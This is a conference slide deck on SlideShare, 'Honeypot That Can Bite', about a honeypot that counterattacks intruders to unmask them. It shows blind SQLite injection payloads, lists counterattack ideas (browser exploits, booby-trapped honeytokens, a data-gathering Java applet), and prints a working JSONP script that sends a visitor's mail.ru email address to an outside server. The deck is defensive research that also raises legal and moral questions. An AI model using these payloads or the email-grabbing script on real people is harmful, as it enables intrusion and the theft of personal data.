SlideShare a Scribd company logo
Alexey Sintsov
@asintsov
DEFCON RUSSIA DC#7812
HONEYPOT THAT CAN BITE: REVERSE
PENETRATION
#WHOAMI
• Senior Security Engineer at
• Writer at
• Ideology and co-organizer of
• Co-Founder of
ZeroNights
#DISCLAIMER
• This story is not connected to my EMPLOYER
• All LIVE data was got from Q2 2011 – Q3 2012
• It was done only for research purposes.
• All data was shared with NOBODY.
• Thx to Alexey Tyurin (@antyurin)
#WHAT IS IT ABOUT
honeypot
• Attract attacker‟s attention (to HoneyPot)
• Get patterns and actions from an attacker behavior
Then Operator can understand what kind of attacker we
have, what he can do in the future and etc. After that we can
Take some „preventative‟ actions.
Example 1. Bot search for PHP LFI bug in PMA
Def. actions:
1) Do we have PMA?
2) Are our PMA installation accessible from
the Internet?
3) Bug fixed?
// but the same we can get from IDS…
Example 2. SQLi attempt. Dumping hashes.
Def. actions:
1) What kind of SQLi he tried to exploit –
let‟s check our web-apps for
same SQLi patterns
2) Check hashes in our databases – is it
salted?
Do we have hashes at all? (or
plain text?)
3) Check access to tables , is it possible to
get access by using „web‟ account?
#WHAT IS IT ABOUT
classic…
IDS Alert
SQLi attempt in some .php
Is it vulnerable?
What attacker
did?
Log/traffic
analysis
Src analysis/
manual
validation
Who is the
attacker?
- Was he looking for
something special?
- Is he going to
comeback?
- How we should be prepared?
Deploy the Incident Response Team
© InfoSecReactions
By @windsheep_
#WHOIS THE ATTACKER
WhiteHats?
#WHOIS THE ATTACKER
Why?
I do not care, main task – fix the bug!
vs.
It‟s interesting, I want to track him!
#WHOIS THE ATTACKER
Who wants to know…
• Enterprise
- Who is hunting us like that?
(oil‟s sector/big R&D)
It is always good to know who has started this activity….
Because if it is just kids, it is one thing,
if government or competitors – another thing.
• Government
- Track cybercrimes
- Track another government… cyber war, blah-blah-blah…
- etc …
#WHOIS THE ATTACKER
IDS/Logs
• IP address - TOR/(chain of)Proxy/BOTnet
• User-Agent - lol
We have sniffed got nothing…..
#HONEYPOT
What I want?
• Fast result: attack or false positive?
• Is it a targeted attack? Or just a scan from botnet?
• Is it a professional or kiddie
• Decloaking the attacker
• Track the attacker
#Offensive
“The only real defence is active defence“
© Mao Zedong
• Hack your enemy first (aggressive)
• Hack your enemy back (defensive)
#Offensive
Not new…
AV/Security companies - to take down botnet:
• Hacking C&C
• Hacking chain of BOTs
• Hacking Admin‟s workstation
© Andrzej Dereszowski, SIGNAL 11, CONFIDence, 2010
#Offensive
We can do more…
“Replay back” – answer with the same exploit back to the source:
• SSH Brute force attack
- if the source has SSH service
- replay with the same login/pass
-- attacker has already changed password on pwned box
• PHP/Perl/Ruby web attacks
- if the source has HTTP service
- replay back with same URI/payload
It is against BOTs, and will not work against real attacker.
#Offensive
WWW
• Is it (the attacker) HUMAN?
• Is he using well-know application (browser/plugins)?
• Can we EXPLOIT it?
Classical ExploitPACK?
#Honeypot
Skills?
Bug  Vulnerability  Exploit  Attack
Can be found automatically
SHOULD be found during manual tests
SHOULD be executed by the attacker
with browser!
Attacker’s level of skills
• Low
• Medium
• High!
• Dangerous, we are
doomed!!!11
#Honeypot
Trap
• DIRBuster attack, give them /admin/admin.php
But what is the password?
// We can detect bruteforce attacks…
• /admin/help.php?id=1 <--SQL Injection
Get password for admin.php
• Login with stolen password to /admin/admin.php
• Attack complete!
#Honeypot
Blind SQL Injection (SQLite)
„ - 500 Error.
This is a bug
„/**/AND/**/ „1‟ /**/like„1‟--
- 200.
This is a vulnerability
„union/**/select(CASE/**/WHEN/**/
sqlite_version()like'3.%'THEN/**/
select(1)from(lololo)ELSE‟BHEU13‟
END)
- 200/500.
This is an exploit
Skill-O-Meter
Additional to Skill-O-Metr
• Filtered Symbols, like „space‟
• WAF with small „holes‟
• etc, like CTF tasks or hackquest…
#Honeypot
Attack
„union/**/select(CASE/**/WHEN(select/**/password/**/from/**/
users/**/where/**/user=„admin‟and/**/password/**/like/‟a%‟)THEN/**/
select(1)from(lololo)ELSE‟PHDays13‟END)
SQLite supports triggers…
#Honeypot
…can bite!
• For each step we can get:
o Human/automated attack (Skill-O-Meter)
o The malicious intention of an attacker
 WhiteHat will finish after finding a SQLi vulnerability. He will not attempt
to get access to forbidden part (admin.php)!
 Ok, ok… even if he got access to admin.php he do not try to get „secret.pdf‟ =)
• On each step we can bite…
o On „attack step‟ we can counterattack…
#Counterattack
What we can?
• Attack his browser/plugins
• 1day/0day exploits
• Social engineering
• Evil Java applet/ActiveX (GUI for administration…)
• Honeytokens
• Attack his env. using a browser.
• Third party services (web-mail/social networks/etc)
• Local env. (localhost/dsl-router)
#Social Engineering
Honeytokens
• PDF file with secret information (and with exploit…)
• EXE file with secret application (fat client for SCADA…)
• etc….
#Backdoor… ?
No – “detective”
• Get jpg/txt/doc files from FS
• Get config files (VPN)
• Get BSSIDs
• Get network/domain configuration
• Get traceroute to us
• Get DNS to us
• Get camera-shot, mic recording
• etc…
Phd final
#Target
• Reverse DNS channel
• ipconfig
• tracert
• Domain name
• Login name
• …
• DO NOT COLLECT PERSONAL INFO
• DO NOT GET ANY DATA FROM HDD
• REMOTE CONTROL DISABLED
#Results
GET requests log
It can be WEB proxy or TOR exit point…
Data from attacker’s PC
#Results
Real logins – second names
Real host-names and domains
Real ISP, IP addresses
#Results
Write-up about First DCG meeting in Russia…
habrahabr.ru  Most technical Russian IT community…
Comments…“ If someone wants invite: ‘ or 1=1– “
#Hello “Red May” 2011
GET requests log
No success with SE or reverse penetration… I am lucky…
#Unexpected
GET requests log
One beautiful
Ex-USSR republic…
Nothing special…
Damn! Special-Super-Secret-Service
of beautiful ex-USSR republic…
Looks like „service‟ username, not
personal… may be it was compromised?
#More drama
… few hours latter, another intrusion to DCG web-site
… from same ex-USSR republic, same city….
… but another subnet
… and again – “reverse penetration”
Known nickname, you can Google him as know hacker form this ex-USSR republic..
may be he is working for this Secret Service
… or compromise this host and use as intermediate…
#Results
• Whitehat‟s companies – have tested our Applet!
• Independent whitehat researchers…
• Backdoored government WS….
• Script kiddies…
#Conclusion
It works!
• We got real usernames of those who did not use VMware/and middle hosts
• We got real source for those who use VMware/TOR/Proxy and did not use middle hosts
• We got intermediate hosts, but we can detect it, end got
• We got configured DNS server address
• And we got it automatically…
The same results possible for honey
token/exploit-back techniques…
SE: Attacker is not expecting back-attack!
#But
Some attackers are careful
//@ahack_ru had known about Honeypot and Java applet and did not run it…
but he was busted anyway!
#Can we attack 3rd party services?
If user is authenticated on others services
HoneyPot
Attacker
SocialNetwork
• Attack begins
• CSRF/XSS attack…
• Callback with ID….
• Proxy/TOR/VPN – it is not about network!
• Works only vs. script-kiddies and whitehats
#Linkedin
#Yandex JSONP
#mail.ru JSONP
Hack 1: SSL
Hack 2: <iframe
src=“data:…
By Egor Homakov
document.write("<iframe src='data:text/html,<html><body>
<script>var sss = document.createElement("script");
sss.src=“
http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612
";
function PortalHeadlineJSONPCallback(objFromMail){
var arr1=objFromMail["data"];
var i = new Image();
i.src = "http://defcon-russia.ru/counter.php?"+arr1["email"];
document.body.appendChild(i);
};
document.body.appendChild(sss);
</script>
</body></html>'>");
#mail.ru exploit
Phd final
#Results
#Conclusion
It works!
• We got real emails
• We got real names
• We can do correlation between two e-mail addresses
and Java Applet response
• And we got it automatically…
#Conclusion
Stats!
• SQLi attacks - 484 (~1.2 years)
• Applet strikes - 52 (~1.2 years)
• Mail grabs - 16 (6 month)
~ 17% success
#Conclusion
Public announcements of
DC Rus
First
meeting
Second
meeting
Sixth meeting
announcement,
pre-Zeronights era
#Conclusion
Everybody likes graphics =)
#Moarrrrrrrrr
Local env. can be attacked!
• Anti DNS pinning / DNS rebinding
• XXXSS by Samy Kamkar (Getting BSSIDs…)
• CSRF/XSS on any local resources….
• There can be million techniques and tricks for that…
#SE – Custom software
Anti-Cybercrime
Login
Detect
fraud/hack
attempt
Classic
ActiveX/Java
Backdoored
ActiveX/Java
Work…
Error/
Meintance
#SE – Custom software
Government level
• SCADA
• Army systems
• FSB/KGB/CIA/MI6/…
• etc..
#SE – Custom software
Наши поделки?
#Conclusion
• Counterattack can work…
• Whitehats are LESS carful when testing something…
• ????
• Moral/Legal
#FIN
alex.sintsov@gmail.com @asintsov

More Related Content

PDF
Google Hacking
PPTX
Hacking with Remote Admin Tools (RAT)
PDF
The art of android hacking
PPTX
How to get along with HATEOAS without letting the bad guys steal your lunch -...
PPT
Django (Web Applications that are Secure by Default)
PDF
Владимир Стыран - Пентест следующего поколения, который ваша компания не може...
PDF
CMS Hacking Tricks - DerbyCon 4 - 2014
Google Hacking
Hacking with Remote Admin Tools (RAT)
The art of android hacking
How to get along with HATEOAS without letting the bad guys steal your lunch -...
Django (Web Applications that are Secure by Default)
Владимир Стыран - Пентест следующего поколения, который ваша компания не може...
CMS Hacking Tricks - DerbyCon 4 - 2014

What's hot (11)

PDF
Recon-Fu @BsidesKyiv 2016
PPTX
Sandbox detection: leak, abuse, test - Hacktivity 2015
PPTX
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
PPTX
Peerlyst Delhi NCR Chapter Meet
PPTX
How to Build Your Own Physical Pentesting Go-bag
PDF
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
PDF
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
PPTX
Security Testing: Fuzzing
PDF
REST API Pentester's perspective
PDF
Ultimate Guide to Setup DarkComet with NoIP
PPTX
Nightmares of a Penetration Tester ( How to protect your network)
Recon-Fu @BsidesKyiv 2016
Sandbox detection: leak, abuse, test - Hacktivity 2015
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Peerlyst Delhi NCR Chapter Meet
How to Build Your Own Physical Pentesting Go-bag
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
Security Testing: Fuzzing
REST API Pentester's perspective
Ultimate Guide to Setup DarkComet with NoIP
Nightmares of a Penetration Tester ( How to protect your network)
Ad

Viewers also liked (9)

PPTX
Core Insight Enterprise Overview
PPT
Wireless security
PPTX
Секретный доклад безопасности YaC 2014
ODP
Koniec testowania na sposób “testerski”. Zmiana paradygmatu testowania oprogr...
PPT
PPTX
Creating "Secure" PHP applications, Part 2, Server Hardening
PDF
Breaking RF Unlock Codes - Presented at TriKC 0x01 (November 2014)
PPTX
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
PPT
Vormetric data security complying with pci dss encryption rules
Core Insight Enterprise Overview
Wireless security
Секретный доклад безопасности YaC 2014
Koniec testowania na sposób “testerski”. Zmiana paradygmatu testowania oprogr...
Creating "Secure" PHP applications, Part 2, Server Hardening
Breaking RF Unlock Codes - Presented at TriKC 0x01 (November 2014)
Creating "Secure" PHP Applications, Part 1, Explicit Code & QA
Vormetric data security complying with pci dss encryption rules
Ad

Similar to Phd final (20)

PDF
DrupalCamp London 2017 - Web site insecurity
PDF
Honeypots for Active Defense
PPTX
Андрей Аваданей - Как с помощью honeypot защитить критические активы компании
PDF
BlueHat v18 || The matrix has you - protecting linux using deception
PPTX
Hacking by Pratyush Gupta
PPTX
Raising the dead to save the living
PPT
Hacking and its Defence
PDF
Virtualisasi Hacking
PPT
NetworkSecurity
PPT
PDF
Penetration Testing is the Art of the Manipulation
PPT
Introduction to Web Server Security
PPTX
Honeypots and honeynets
PPT
Hack the hack
PDF
Stealth post-exploitation with phpsploit
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
PPT
Network security
PDF
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
PDF
What should I do when my website got hack?
DrupalCamp London 2017 - Web site insecurity
Honeypots for Active Defense
Андрей Аваданей - Как с помощью honeypot защитить критические активы компании
BlueHat v18 || The matrix has you - protecting linux using deception
Hacking by Pratyush Gupta
Raising the dead to save the living
Hacking and its Defence
Virtualisasi Hacking
NetworkSecurity
Penetration Testing is the Art of the Manipulation
Introduction to Web Server Security
Honeypots and honeynets
Hack the hack
Stealth post-exploitation with phpsploit
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Network security
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
What should I do when my website got hack?

More from Positive Hack Days (20)

PPTX
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
PPTX
Как мы собираем проекты в выделенном окружении в Windows Docker
PPTX
Типовая сборка и деплой продуктов в Positive Technologies
PPTX
Аналитика в проектах: TFS + Qlik
PPTX
Использование анализатора кода SonarQube
PPTX
Развитие сообщества Open DevOps Community
PPTX
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
PPTX
Автоматизация построения правил для Approof
PDF
Мастер-класс «Трущобы Application Security»
PDF
Формальные методы защиты приложений
PDF
Эвристические методы защиты приложений
PDF
Теоретические основы Application Security
PPTX
От экспериментального программирования к промышленному: путь длиной в 10 лет
PDF
Уязвимое Android-приложение: N проверенных способов наступить на грабли
PPTX
Требования по безопасности в архитектуре ПО
PDF
Формальная верификация кода на языке Си
PPTX
Механизмы предотвращения атак в ASP.NET Core
PDF
SOC для КИИ: израильский опыт
PDF
Honeywell Industrial Cyber Security Lab & Services Center
PDF
Credential stuffing и брутфорс-атаки
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Как мы собираем проекты в выделенном окружении в Windows Docker
Типовая сборка и деплой продуктов в Positive Technologies
Аналитика в проектах: TFS + Qlik
Использование анализатора кода SonarQube
Развитие сообщества Open DevOps Community
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Автоматизация построения правил для Approof
Мастер-класс «Трущобы Application Security»
Формальные методы защиты приложений
Эвристические методы защиты приложений
Теоретические основы Application Security
От экспериментального программирования к промышленному: путь длиной в 10 лет
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Требования по безопасности в архитектуре ПО
Формальная верификация кода на языке Си
Механизмы предотвращения атак в ASP.NET Core
SOC для КИИ: израильский опыт
Honeywell Industrial Cyber Security Lab & Services Center
Credential stuffing и брутфорс-атаки

Recently uploaded (20)

PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
PDF
A comparative analysis of optical character recognition models for extracting...
PDF
Getting Started with Data Integration: FME Form 101
PPTX
Tartificialntelligence_presentation.pptx
PDF
Encapsulation theory and applications.pdf
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PPTX
Spectroscopy.pptx food analysis technology
PDF
Spectral efficient network and resource selection model in 5G networks
PDF
Machine learning based COVID-19 study performance prediction
PPTX
TLE Review Electricity (Electricity).pptx
PPTX
cloud_computing_Infrastucture_as_cloud_p
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PDF
Mushroom cultivation and it's methods.pdf
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PPTX
A Presentation on Artificial Intelligence
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
PPTX
Machine Learning_overview_presentation.pptx
Assigned Numbers - 2025 - Bluetooth® Document
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
A comparative analysis of optical character recognition models for extracting...
Getting Started with Data Integration: FME Form 101
Tartificialntelligence_presentation.pptx
Encapsulation theory and applications.pdf
Accuracy of neural networks in brain wave diagnosis of schizophrenia
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Spectroscopy.pptx food analysis technology
Spectral efficient network and resource selection model in 5G networks
Machine learning based COVID-19 study performance prediction
TLE Review Electricity (Electricity).pptx
cloud_computing_Infrastucture_as_cloud_p
Diabetes mellitus diagnosis method based random forest with bat algorithm
Mushroom cultivation and it's methods.pdf
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
A Presentation on Artificial Intelligence
Group 1 Presentation -Planning and Decision Making .pptx
Machine Learning_overview_presentation.pptx

Phd final

  • 1. Alexey Sintsov @asintsov DEFCON RUSSIA DC#7812 HONEYPOT THAT CAN BITE: REVERSE PENETRATION
  • 2. #WHOAMI • Senior Security Engineer at • Writer at • Ideology and co-organizer of • Co-Founder of ZeroNights
  • 3. #DISCLAIMER • This story is not connected to my EMPLOYER • All LIVE data was got from Q2 2011 – Q3 2012 • It was done only for research purposes. • All data was shared with NOBODY. • Thx to Alexey Tyurin (@antyurin)
  • 4. #WHAT IS IT ABOUT honeypot • Attract attacker‟s attention (to HoneyPot) • Get patterns and actions from an attacker behavior Then Operator can understand what kind of attacker we have, what he can do in the future and etc. After that we can Take some „preventative‟ actions. Example 1. Bot search for PHP LFI bug in PMA Def. actions: 1) Do we have PMA? 2) Are our PMA installation accessible from the Internet? 3) Bug fixed? // but the same we can get from IDS… Example 2. SQLi attempt. Dumping hashes. Def. actions: 1) What kind of SQLi he tried to exploit – let‟s check our web-apps for same SQLi patterns 2) Check hashes in our databases – is it salted? Do we have hashes at all? (or plain text?) 3) Check access to tables , is it possible to get access by using „web‟ account?
  • 5. #WHAT IS IT ABOUT classic… IDS Alert SQLi attempt in some .php Is it vulnerable? What attacker did? Log/traffic analysis Src analysis/ manual validation Who is the attacker? - Was he looking for something special? - Is he going to comeback? - How we should be prepared? Deploy the Incident Response Team © InfoSecReactions By @windsheep_
  • 7. #WHOIS THE ATTACKER Why? I do not care, main task – fix the bug! vs. It‟s interesting, I want to track him!
  • 8. #WHOIS THE ATTACKER Who wants to know… • Enterprise - Who is hunting us like that? (oil‟s sector/big R&D) It is always good to know who has started this activity…. Because if it is just kids, it is one thing, if government or competitors – another thing. • Government - Track cybercrimes - Track another government… cyber war, blah-blah-blah… - etc …
  • 9. #WHOIS THE ATTACKER IDS/Logs • IP address - TOR/(chain of)Proxy/BOTnet • User-Agent - lol We have sniffed got nothing…..
  • 10. #HONEYPOT What I want? • Fast result: attack or false positive? • Is it a targeted attack? Or just a scan from botnet? • Is it a professional or kiddie • Decloaking the attacker • Track the attacker
  • 11. #Offensive “The only real defence is active defence“ © Mao Zedong • Hack your enemy first (aggressive) • Hack your enemy back (defensive)
  • 12. #Offensive Not new… AV/Security companies - to take down botnet: • Hacking C&C • Hacking chain of BOTs • Hacking Admin‟s workstation © Andrzej Dereszowski, SIGNAL 11, CONFIDence, 2010
  • 13. #Offensive We can do more… “Replay back” – answer with the same exploit back to the source: • SSH Brute force attack - if the source has SSH service - replay with the same login/pass -- attacker has already changed password on pwned box • PHP/Perl/Ruby web attacks - if the source has HTTP service - replay back with same URI/payload It is against BOTs, and will not work against real attacker.
  • 14. #Offensive WWW • Is it (the attacker) HUMAN? • Is he using well-know application (browser/plugins)? • Can we EXPLOIT it? Classical ExploitPACK?
  • 15. #Honeypot Skills? Bug  Vulnerability  Exploit  Attack Can be found automatically SHOULD be found during manual tests SHOULD be executed by the attacker with browser! Attacker’s level of skills • Low • Medium • High! • Dangerous, we are doomed!!!11
  • 16. #Honeypot Trap • DIRBuster attack, give them /admin/admin.php But what is the password? // We can detect bruteforce attacks… • /admin/help.php?id=1 <--SQL Injection Get password for admin.php • Login with stolen password to /admin/admin.php • Attack complete!
  • 17. #Honeypot Blind SQL Injection (SQLite) „ - 500 Error. This is a bug „/**/AND/**/ „1‟ /**/like„1‟-- - 200. This is a vulnerability „union/**/select(CASE/**/WHEN/**/ sqlite_version()like'3.%'THEN/**/ select(1)from(lololo)ELSE‟BHEU13‟ END) - 200/500. This is an exploit Skill-O-Meter Additional to Skill-O-Metr • Filtered Symbols, like „space‟ • WAF with small „holes‟ • etc, like CTF tasks or hackquest…
  • 19. #Honeypot …can bite! • For each step we can get: o Human/automated attack (Skill-O-Meter) o The malicious intention of an attacker  WhiteHat will finish after finding a SQLi vulnerability. He will not attempt to get access to forbidden part (admin.php)!  Ok, ok… even if he got access to admin.php he do not try to get „secret.pdf‟ =) • On each step we can bite… o On „attack step‟ we can counterattack…
  • 20. #Counterattack What we can? • Attack his browser/plugins • 1day/0day exploits • Social engineering • Evil Java applet/ActiveX (GUI for administration…) • Honeytokens • Attack his env. using a browser. • Third party services (web-mail/social networks/etc) • Local env. (localhost/dsl-router)
  • 21. #Social Engineering Honeytokens • PDF file with secret information (and with exploit…) • EXE file with secret application (fat client for SCADA…) • etc….
  • 22. #Backdoor… ? No – “detective” • Get jpg/txt/doc files from FS • Get config files (VPN) • Get BSSIDs • Get network/domain configuration • Get traceroute to us • Get DNS to us • Get camera-shot, mic recording • etc…
  • 24. #Target • Reverse DNS channel • ipconfig • tracert • Domain name • Login name • … • DO NOT COLLECT PERSONAL INFO • DO NOT GET ANY DATA FROM HDD • REMOTE CONTROL DISABLED
  • 25. #Results GET requests log It can be WEB proxy or TOR exit point… Data from attacker’s PC
  • 26. #Results Real logins – second names Real host-names and domains Real ISP, IP addresses
  • 27. #Results Write-up about First DCG meeting in Russia… habrahabr.ru  Most technical Russian IT community… Comments…“ If someone wants invite: ‘ or 1=1– “
  • 28. #Hello “Red May” 2011 GET requests log No success with SE or reverse penetration… I am lucky…
  • 29. #Unexpected GET requests log One beautiful Ex-USSR republic… Nothing special… Damn! Special-Super-Secret-Service of beautiful ex-USSR republic… Looks like „service‟ username, not personal… may be it was compromised?
  • 30. #More drama … few hours latter, another intrusion to DCG web-site … from same ex-USSR republic, same city…. … but another subnet … and again – “reverse penetration” Known nickname, you can Google him as know hacker form this ex-USSR republic.. may be he is working for this Secret Service … or compromise this host and use as intermediate…
  • 31. #Results • Whitehat‟s companies – have tested our Applet! • Independent whitehat researchers… • Backdoored government WS…. • Script kiddies…
  • 32. #Conclusion It works! • We got real usernames of those who did not use VMware/and middle hosts • We got real source for those who use VMware/TOR/Proxy and did not use middle hosts • We got intermediate hosts, but we can detect it, end got • We got configured DNS server address • And we got it automatically… The same results possible for honey token/exploit-back techniques… SE: Attacker is not expecting back-attack!
  • 33. #But Some attackers are careful //@ahack_ru had known about Honeypot and Java applet and did not run it… but he was busted anyway!
  • 34. #Can we attack 3rd party services? If user is authenticated on others services HoneyPot Attacker SocialNetwork • Attack begins • CSRF/XSS attack… • Callback with ID…. • Proxy/TOR/VPN – it is not about network! • Works only vs. script-kiddies and whitehats
  • 37. #mail.ru JSONP Hack 1: SSL Hack 2: <iframe src=“data:… By Egor Homakov
  • 38. document.write("<iframe src='data:text/html,<html><body> <script>var sss = document.createElement("script"); sss.src=“ http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612 "; function PortalHeadlineJSONPCallback(objFromMail){ var arr1=objFromMail["data"]; var i = new Image(); i.src = "http://defcon-russia.ru/counter.php?"+arr1["email"]; document.body.appendChild(i); }; document.body.appendChild(sss); </script> </body></html>'>"); #mail.ru exploit
  • 41. #Conclusion It works! • We got real emails • We got real names • We can do correlation between two e-mail addresses and Java Applet response • And we got it automatically…
  • 42. #Conclusion Stats! • SQLi attacks - 484 (~1.2 years) • Applet strikes - 52 (~1.2 years) • Mail grabs - 16 (6 month) ~ 17% success
  • 43. #Conclusion Public announcements of DC Rus First meeting Second meeting Sixth meeting announcement, pre-Zeronights era
  • 45. #Moarrrrrrrrr Local env. can be attacked! • Anti DNS pinning / DNS rebinding • XXXSS by Samy Kamkar (Getting BSSIDs…) • CSRF/XSS on any local resources…. • There can be million techniques and tricks for that…
  • 46. #SE – Custom software Anti-Cybercrime Login Detect fraud/hack attempt Classic ActiveX/Java Backdoored ActiveX/Java Work… Error/ Meintance
  • 47. #SE – Custom software Government level • SCADA • Army systems • FSB/KGB/CIA/MI6/… • etc..
  • 48. #SE – Custom software Наши поделки?
  • 49. #Conclusion • Counterattack can work… • Whitehats are LESS carful when testing something… • ???? • Moral/Legal